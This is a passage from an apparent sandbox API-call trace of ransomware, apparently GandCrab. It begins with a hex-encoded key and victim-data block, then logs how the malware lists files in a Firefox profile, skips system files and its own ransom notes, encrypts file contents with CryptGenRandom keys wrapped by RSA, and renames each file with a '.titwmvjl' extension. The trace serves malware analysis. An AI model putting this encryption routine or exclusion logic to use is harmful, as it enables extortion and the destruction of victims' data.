\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0084.821] WriteFile (in: hFile=0x2e8, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259db40, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259db40*=0x2162, lpOverlapped=0x0) returned 1 [0084.822] CloseHandle (hObject=0x2e8) returned 1 [0084.822] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.822] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.822] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1e, wMilliseconds=0x88)) [0084.822] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.822] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0084.822] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0084.823] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\d2ca4a09d2ca4deb61a.lock") returned 171 [0084.823] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2e8 [0084.824] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.824] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.824] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\") returned 147 [0084.824] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\*" [0084.824] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\*", fInfoLevelId=0x1, lpFindFileData=0x259db5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259db5c) returned 0x5037b8 [0084.825] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.825] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259db5c | out: lpFindFileData=0x259db5c) returned 1 [0084.825] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.825] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.825] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259db5c | out: lpFindFileData=0x259db5c) returned 1 [0084.825] lstrcmpW (lpString1="1", lpString2=".") returned 1 [0084.825] lstrcmpW (lpString1="1", lpString2="..") returned 1 [0084.825] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\", lpString2="1" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1" [0084.825] lstrlenW (lpString=".titwmvjl") returned 9 [0084.825] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1") returned 148 [0084.825] VirtualAlloc (lpAddress=0x0, dwSize=0x168, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.826] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1.titwmvjl") returned 157 [0084.826] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1") returned 148 [0084.826] lstrlenW (lpString=".files\\1") returned 8 [0084.826] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.826] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".files\\1 ") returned 9 [0084.826] lstrcmpiW (lpString1=".files\\1", lpString2=".titwmvjl") returned -1 [0084.826] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.826] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1") returned 148 [0084.826] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1") returned 148 [0084.826] lstrcmpiW (lpString1="1", lpString2="desktop.ini") returned -1 [0084.826] lstrcmpiW (lpString1="1", lpString2="autorun.inf") returned -1 [0084.826] lstrcmpiW (lpString1="1", lpString2="ntuser.dat") returned -1 [0084.827] lstrcmpiW (lpString1="1", lpString2="iconcache.db") returned -1 [0084.827] lstrcmpiW (lpString1="1", lpString2="bootsect.bak") returned -1 [0084.827] lstrcmpiW (lpString1="1", lpString2="boot.ini") returned -1 [0084.827] lstrcmpiW (lpString1="1", lpString2="ntuser.dat.log") returned -1 [0084.827] lstrcmpiW (lpString1="1", lpString2="thumbs.db") returned -1 [0084.827] lstrcmpiW (lpString1="1", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0084.827] lstrcmpiW (lpString1="1", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0084.827] lstrcmpiW (lpString1="1", lpString2="KRAB-DECRYPT.html") returned -1 [0084.827] lstrcmpiW (lpString1="1", lpString2="CRAB-DECRYPT.html") returned -1 [0084.827] lstrcmpiW (lpString1="1", lpString2="KRAB-DECRYPT.txt") returned -1 [0084.827] lstrcmpiW (lpString1="1", lpString2="CRAB-DECRYPT.txt") returned -1 [0084.827] lstrcmpiW (lpString1="1", lpString2="ntldr") returned -1 [0084.827] lstrcmpiW (lpString1="1", lpString2="NTDETECT.COM") returned -1 [0084.827] lstrcmpiW (lpString1="1", lpString2="Bootfont.bin") returned -1 [0084.827] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1") returned 148 [0084.827] lstrlenW (lpString=".files\\1") returned 8 [0084.827] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.827] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".files\\1 ") returned 9 [0084.827] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.828] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.828] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2f0 [0084.828] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.829] ReadFile (in: hFile=0x2f0, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259daa8, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259daa8*=0x21c, lpOverlapped=0x0) returned 1 [0084.836] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.836] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.836] CryptAcquireContextW (in: phProv=0x259d9d8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259d9d8*=0x4c9980) returned 1 [0084.837] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0084.837] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0084.838] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0084.838] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259da64 | out: pbBuffer=0x259da64) returned 1 [0084.838] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.838] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.838] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.838] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.838] CryptAcquireContextW (in: phProv=0x259d9d8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259d9d8*=0x4c9980) returned 1 [0084.839] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0084.840] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0084.840] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0084.840] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259da84 | out: pbBuffer=0x259da84) returned 1 [0084.840] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.840] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.840] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.840] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.840] CryptAcquireContextW (in: phProv=0x259d9cc, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259d9cc*=0x4c9980) returned 1 [0084.841] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.842] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259d9d0 | out: phKey=0x259d9d0*=0x5037f8) returned 1 [0084.842] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.842] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259d9c4, pdwDataLen=0x259d9c8, dwFlags=0x0 | out: pbData=0x259d9c4*=0x800, pdwDataLen=0x259d9c8*=0x4) returned 1 [0084.842] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.842] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259d9fc*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259d9fc*=0x100) returned 1 [0084.842] GetLastError () returned 0x0 [0084.842] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.842] CryptDestroyKey (hKey=0x5037f8) returned 1 [0084.842] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.843] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.843] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.843] CryptAcquireContextW (in: phProv=0x259d9cc, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259d9cc*=0x4c9980) returned 1 [0084.844] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.844] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259d9d0 | out: phKey=0x259d9d0*=0x503638) returned 1 [0084.844] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.844] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259d9c4, pdwDataLen=0x259d9c8, dwFlags=0x0 | out: pbData=0x259d9c4*=0x800, pdwDataLen=0x259d9c8*=0x4) returned 1 [0084.844] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.844] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259d9fc*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259d9fc*=0x100) returned 1 [0084.845] GetLastError () returned 0x0 [0084.845] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.845] CryptDestroyKey (hKey=0x503638) returned 1 [0084.845] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.845] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.845] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0084.845] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0084.846] ReadFile (in: hFile=0x2f0, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259daa8, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259daa8*=0x81229, lpOverlapped=0x0) returned 1 [0084.878] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0xfff7edd7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.878] WriteFile (in: hFile=0x2f0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x81229, lpNumberOfBytesWritten=0x259da8c, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259da8c*=0x81229, lpOverlapped=0x0) returned 1 [0084.891] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.891] WriteFile (in: hFile=0x2f0, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259da8c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259da8c*=0x21c, lpOverlapped=0x0) returned 1 [0084.892] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.896] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.899] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.899] CloseHandle (hObject=0x2f0) returned 1 [0084.900] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1.titwmvjl"), dwFlags=0x1) returned 1 [0084.900] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.901] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259db5c | out: lpFindFileData=0x259db5c) returned 1 [0084.901] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0084.901] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0084.901] lstrcatW (in: 